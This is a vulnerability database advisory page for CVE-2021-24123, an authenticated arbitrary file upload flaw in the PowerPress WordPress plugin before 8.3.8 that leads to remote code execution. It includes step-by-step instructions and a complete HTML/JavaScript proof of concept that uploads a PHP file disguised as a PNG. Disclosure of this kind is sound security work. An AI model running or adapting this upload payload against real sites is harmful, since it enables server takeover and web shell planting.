Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitMinhtuanactWPEX-ID:43AA30BF-EAF8-467A-93A1-78F9BDB37B36
HistoryOct 11, 2020 - 12:00 a.m.

PowerPress < 8.3.8 - Authenticated Arbitrary File Upload leading to RCE

2020-10-1100:00:00
minhtuanact
390
powerpress
arbitrary file upload
rce
html
xss
admin
nonce

EPSS

0.001

Percentile

44.4%

JSON

The plugin did not verify some of the uploaded feed images (such as the ones from Podcast Artwork section), allowing high privilege accounts (admin+) being able to upload arbitrary files, such as php, leading to RCE.

https://drive.google.com/file/d/1fyf6blzeG3VX22BQX7hc1QJ20rCY5p43/view?usp=sharing

- Save the below HTML code in an HTML file
- Replace the <BLOG> to the correct one
- Logon to the blog as admin, go to the Blubrry PowerPress Settings > Feeds and get the nonce from the source of the page (Look for "_wpnonce) and replace <NONCE> by it's value in the saved code
- Open the saved HTML file with the same browser used to login to the blog, and click on 'Submit request'
- Then open <BLOG>/wp-content/uploads/powerpress/up.php in the browser
 
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/<BLOG>\/wp-admin\/admin.php?page=powerpressadmin_basic", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundary5Ac7Ayyi2qVtiLqA");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"_wpnonce\"\r\n" + 
          "\r\n" + 
          "<NONCE>\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"action\"\r\n" + 
          "\r\n" + 
          "powerpress-save-settings\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"Feed[rss2_image]\"\r\n" + 
          "\r\n" + 
          "aa.png\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"rss2_image_checkbox\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"rss2_image_file\"; filename=\"up.php\"\r\n" + 
          "Content-Type: image/png\r\n" + 
          "\r\n" + 
          "\x89PNG\r\n" + 
          "\x1a\n" + 
          "\x3c?php phpinfo(); ?\x3e\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Related

cvelist 1
prion 1
wpvulndb 1
nvd 1
cve 1
cvelist
cvelist
CVE-2021-24123 PowerPress < 8.3.8 - Authenticated Arbitrary File Upload leading to RCE
2021-03-18 14:57:47
prion
prion
Design/Logic Flaw
2021-03-18 15:15:00
wpvulndb
wpvulndb
PowerPress < 8.3.8 - Authenticated Arbitrary File Upload leading to RCE
2020-10-11 00:00:00
nvd
nvd
CVE-2021-24123
2021-03-18 15:15:13
cve
cve
CVE-2021-24123
2021-03-18 15:15:13

EPSS

0.001

Percentile

44.4%

JSON
Related for WPEX-ID:43AA30BF-EAF8-467A-93A1-78F9BDB37B36
cvelist1prion1wpvulndb1nvd1cve1